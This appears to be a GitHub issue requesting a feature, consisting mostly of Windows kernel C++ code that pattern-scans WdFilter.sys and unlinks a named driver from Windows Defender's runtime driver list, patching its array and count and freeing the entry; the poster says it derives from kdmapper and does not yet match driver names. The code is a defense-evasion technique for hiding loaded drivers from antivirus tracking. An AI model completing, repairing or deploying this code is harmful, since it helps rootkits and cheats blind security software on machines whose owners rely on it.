
can you add clear_wdfilter_driver_list? #4

@BaiFeng666

Description

@BaiFeng666

```cpp
// Unlinks one entry from the runtime driver list that WdFilter.sys (Windows
// Defender's file system filter driver) keeps in its own kernel memory, by
// writing directly into that driver's private data structures.
//
// Everything below depends on byte-pattern scans over the WdFilter image plus
// hard-coded offsets into an undocumented layout. Any WdFilter update can make
// a scan miss (the function then returns false) or, worse, match unrelated
// bytes, in which case the dereferences and writes that follow land on
// arbitrary kernel memory. No synchronization with the owning driver is taken
// here, so the list, the array and the count are modified while WdFilter may be
// using them.
//
// name:    wide string tested against each entry's name (substring match, see
//          the wcsstr call below).
// returns: true when a matching entry was removed; false when the module, any
//          of the three patterns, or the entry's array slot could not be found.
bool clear_wd_filter_driver_list(const wchar_t* name)
{
// Unconditional breakpoint left in. Harmless under an attached kernel
// debugger; without one a kernel-mode breakpoint typically ends in a bug check.
DbgBreakPoint();
ULONG WdFilterSize = 0;
// Base address and image size of the loaded WdFilter module (helper defined
// elsewhere in the project).
auto WdFilter = (ULONG64)GetSystemModuleBase(L"WdFilter.sys", &WdFilterSize);
if (WdFilter == 0) return false;

// Three signature scans over the image: the instruction that references the
// driver list, the one that references the driver count, and a code site that
// calls MpFreeDriverInfoEx. "?" presumably marks a wildcard byte in the
// helper's pattern syntax — confirm against FindPattern_Wrapper.
auto RuntimeDriversList = (ULONG64)FindPattern_Wrapper((PUCHAR)WdFilter, WdFilterSize,
	"48 8B 0D ? ? ? ? FF 05");
if (!RuntimeDriversList) return false;

auto RuntimeDriversCountRef = (ULONG64)FindPattern_Wrapper((PUCHAR)WdFilter, WdFilterSize,
	"FF 05 ? ? ? ? 48 39 11");
if (!RuntimeDriversCountRef) return false;

// Two alternative patterns for the same call site, to cover more than one
// WdFilter build.
auto MpFreeDriverInfoExRef = (ULONG64)FindPattern_Wrapper((PUCHAR)WdFilter, WdFilterSize,
	"49 8B C9 ? 89 ? 08 E8 ? ? ? ? ? ? ? ? ? ? ? E9");
if (!MpFreeDriverInfoExRef) {
	MpFreeDriverInfoExRef = (ULONG64)FindPattern_Wrapper((PUCHAR)WdFilter, WdFilterSize,
		"48 89 4A ? 49 8B ? E8 ? ? ? ? ? ? ? ? ? ? ? E9");
	if (!MpFreeDriverInfoExRef) return false;
}

// Both patterns place the call (E8) 7 bytes after the match start; this
// constant must change in step with the patterns above.
MpFreeDriverInfoExRef += 0x7; // skip until call instruction

// Turn the RIP-relative operands into absolute addresses. The second argument
// looks like the operand's byte offset inside the instruction — confirm
// against ResolveRelativeAddress.
RuntimeDriversList = (ULONG64)ResolveRelativeAddress((LPBYTE)RuntimeDriversList, 3);
// The list head is assumed to sit 8 bytes before the referenced pointer.
ULONG64 RuntimeDriversList_Head = RuntimeDriversList - 0x8;
ULONG64 RuntimeDriversCount = (ULONG64)ResolveRelativeAddress((LPBYTE)RuntimeDriversCountRef, 2);
// The array pointer is read from the 8 bytes following the count.
ULONG64 RuntimeDriversArray = RuntimeDriversCount + 0x8;
RuntimeDriversArray = *(ULONG64*)RuntimeDriversArray;
ULONG64 MpFreeDriverInfoEx = (ULONG64)ResolveRelativeAddress((LPBYTE)MpFreeDriverInfoExRef, 1);

// Walk the doubly linked list until the iteration returns to the head.
for (PLIST_ENTRY Entry = *(PLIST_ENTRY*)(RuntimeDriversList_Head);
	Entry != (LIST_ENTRY*)RuntimeDriversList_Head;
	Entry = Entry->Flink)
{
	//PUNICODE_STRING Unicode_String = (PUNICODE_STRING)((ULONG64)Entry + 0x10);
	// Copy of the UNICODE_STRING expected to follow the link fields.
	UNICODE_STRING Unicode_String = *(UNICODE_STRING*)(Entry + 0x10);
	// MmIsAddressValid only tells whether the page can be touched without a
	// fault; it does not validate that Buffer holds a terminated string.
	if (MmIsAddressValid(Unicode_String.Buffer)) {
		LogInfo(0, "Found Driver: %ws", Unicode_String.Buffer);
		// Substring test, not an exact name comparison.
		if (wcsstr(name, Unicode_String.Buffer)) {

			//remove from RuntimeDriversArray
			bool removedRuntimeDriversArray = false;
			// The array is expected to hold pointers to the block 0x10 bytes
			// before the link fields of each entry.
			PVOID SameIndexList = (PVOID)((ULONG64)Entry - 0x10);
			// Bounded linear scan of 8-byte slots; 256 is an assumed upper
			// bound on the array size, not a value read from WdFilter.
			for (int k = 0; k < 256; k++) { // max RuntimeDriversArray elements

				PVOID value = *(PVOID*)(RuntimeDriversArray + (k * 8));
				if (value == SameIndexList) {
					// The slot is overwritten with a sentinel pointer
					// (address of the count, plus one) rather than nulled.
					PVOID emptyval = (PVOID)(RuntimeDriversCount + 1); // this is not count+1 is position of cout addr+1
					*(PVOID*)(RuntimeDriversArray + (k * 8)) = emptyval;
					removedRuntimeDriversArray = true;
					break;
				}
			}

			// Give up before touching the list if the array slot was not
			// found, so array and list do not go out of step.
			if (!removedRuntimeDriversArray) return false;


			// Unlink Entry from the doubly linked list.
			auto NextEntry = Entry->Flink;
			auto PrevEntry = Entry->Blink;

			NextEntry->Blink = PrevEntry;
			PrevEntry->Flink = NextEntry;

			// decrement RuntimeDriversCount
			// Count is treated as a 32-bit value at the resolved address.
			*(ULONG*)RuntimeDriversCount = *(ULONG*)RuntimeDriversCount - 1;
			// call MpFreeDriverInfoEx
			// The driver-info block is assumed to start 0x20 bytes before
			// the link fields.
			ULONG64 DriverInfo = (ULONG64)Entry - 0x20;

			//verify DriverInfo Magic
			// The magic check guards the free call: an unknown layout
			// leaves the block allocated rather than freeing the wrong
			// memory.
			USHORT Magic = *(USHORT*)DriverInfo;
			if (Magic != 0xDA18) {
				//Log("[!] DriverInfo Magic is invalid, new wdfilter version?, driver info will not be released to prevent bsod" << std::endl);
			}
			else {
				// Calls the resolved WdFilter-internal function through a
				// fastcall pointer with the block address as its only argument.
				using MpFreeDriverInfoExFn = void(__fastcall*)(ULONG64);
				MpFreeDriverInfoExFn MpFreeDriverInfoEx_ = (MpFreeDriverInfoExFn)MpFreeDriverInfoEx;
				MpFreeDriverInfoEx_(DriverInfo);
			}

			//LogInfo(0, "WdFilterDriverList Cleaned: %s\n", Unicode_String.Buffer);
			// Only the first matching entry is processed.
			return true;
		}
	}
}

// No entry matched (or none had a readable name buffer).
return false;

}
```

This code was largely taken from kdmapper and converted to kernel code, but there are some problems: it is unable to match the loaded driver name in runtimeDrivers.
